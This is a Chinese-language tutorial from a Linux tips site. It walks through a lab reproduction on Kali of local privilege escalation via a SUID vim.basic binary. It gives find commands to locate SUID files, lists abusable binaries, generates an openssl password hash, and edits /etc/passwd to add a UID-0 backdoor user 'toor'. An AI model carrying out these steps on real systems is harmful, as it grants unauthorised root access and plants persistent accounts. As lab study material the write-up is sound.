快捷導(dǎo)航

Linux使用suid vim.basic文件實(shí)現(xiàn)提權(quán)

更新時(shí)間：2020年07月31日 08:53:50 作者：This_is_Y

這篇文章主要介紹了Linux使用suid vim.basic文件實(shí)現(xiàn)提權(quán),文中通過(guò)示例代碼介紹的非常詳細(xì)，對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友可以參考下

在kali上復(fù)現(xiàn)

先給需要的vim.basic文件設(shè)置suid權(quán)限

chmod u+s /usr/bin/vim.basic

先adduser test1一個(gè)普通權(quán)限用戶

現(xiàn)在就是一個(gè)合適的提權(quán)環(huán)境

通過(guò)以下命令可以找到存在suid權(quán)限的文件

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \；

可用于提權(quán)的文件有

nmap
vim
find
bash
more
less
nano
cp

利用vim提權(quán)的思路是修改etc/passwd文件，為自己添加一個(gè)有root權(quán)限的用戶

passwd文件用戶格式為：用戶名:密碼:uid:gid:注釋:home目錄:用戶的shell

這邊可以看看root用戶的格式

root:x:0:0:root:/root:/bin/bash

（密碼這部分之所以是x，是因?yàn)檎嬲拿艽a存在/etc/shadow文件里）

生成密碼：用openssl passwd -1 –salt asd 123 （這里是-1（數(shù)字1）不是L）

直接寫在passwd文件里面，

toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash

用vim /etc/passwd可以修改，但是在保存是會(huì)出現(xiàn)E212，無(wú)法保存，提示我們沒有權(quán)限修改這個(gè)

這時(shí)應(yīng)該用之前find找到的vim.basic文件運(yùn)行，這個(gè)程序是有suid權(quán)限的。絕對(duì)可以修改

vim.basic /etc/passwd

用這個(gè)打開，然后修改文件，就可以成功保存

可以看到已經(jīng)添加了，su toor切換，密碼123，再id查看一下權(quán)限

root權(quán)限

chmod u+s /usr/bin/vim.basic

以上就是本文的全部?jī)?nèi)容，希望對(duì)大家的學(xué)習(xí)有所幫助，也希望大家多多支持腳本之家。

您可能感興趣的文章:

相關(guān)文章

在 awk 中使用循環(huán)
awk 腳本有三個(gè)主要部分：BEGIN 和 END 函數(shù)（都可選），用戶自己寫的每次要執(zhí)行的函數(shù)。這篇文章主要介紹了在 awk 中怎么使用循環(huán),需要的朋友可以參考下
2019-12-12
CentOS6.4 下安裝SVN的詳細(xì)教程(超詳細(xì))
這篇文章主要介紹了CentOS6.4 下安裝SVN的詳細(xì)教程，在安裝之前需要檢查是否已經(jīng)安裝過(guò)了，然后使用yum install subversion安裝，具體操作詳細(xì)過(guò)程請(qǐng)參考本文
2016-10-10
Linux目錄與文件操作方式
本文詳細(xì)介紹了Linux系統(tǒng)的目錄結(jié)構(gòu)、常用的文件操作命令、文本編輯器vi的使用技巧以及文件壓縮和解壓縮命令。內(nèi)容涵蓋了如cat、grep、vi、gzip等命令的具體用法，適合Linux用戶和開發(fā)者參考學(xué)習(xí)
2024-09-09
Linux使用scp命令進(jìn)行文件遠(yuǎn)程拷貝詳解
scp就是secure copy，一個(gè)在linux下用來(lái)進(jìn)行遠(yuǎn)程拷貝文件的命令。下面這篇文章主要給大家介紹了關(guān)于Linux使用scp命令進(jìn)行文件遠(yuǎn)程拷貝的相關(guān)資料，文中通過(guò)示例代碼介紹的非常詳細(xì)，需要的朋友可以參考下
2018-12-12
linux網(wǎng)絡(luò)NAT配置方式詳解
這篇文章主要為大家詳細(xì)介紹了linux網(wǎng)絡(luò)NAT配置方式，具有一定的參考價(jià)值，感興趣的小伙伴們可以參考一下
2018-08-08
linux swap交換內(nèi)存擴(kuò)容的方法
這篇文章主要介紹了linux swap交換內(nèi)存擴(kuò)容的方法，文中通過(guò)示例代碼介紹的非常詳細(xì)，對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值，需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
2020-07-07
linux上傳并配置jdk和tomcat的教程詳解
這篇文章主要介紹了linux上傳并配置jdk和tomcat的操作方法，本文給大家介紹的非常詳細(xì)，對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
2020-06-06
Linux進(jìn)程間通信方式之socket使用實(shí)例
這篇文章主要介紹了Linux進(jìn)程間通信方式之socket使用實(shí)例，具有一定參考價(jià)值，需要的朋友可以了解下。
2017-11-11
Bash中文件描述符的詳細(xì)介紹
這篇文章主要給大家介紹了關(guān)于Bash中文件描述符的相關(guān)資料，文中通過(guò)示例代碼介紹的非常詳細(xì)，對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值，需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧。
2018-04-04
詳解在Linux中清空或刪除大文件內(nèi)容的5種方法
這篇文章主要介紹了詳解在Linux中清空或刪除大文件內(nèi)容的5種方法，小編覺得挺不錯(cuò)的，現(xiàn)在分享給大家，也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧
2018-11-11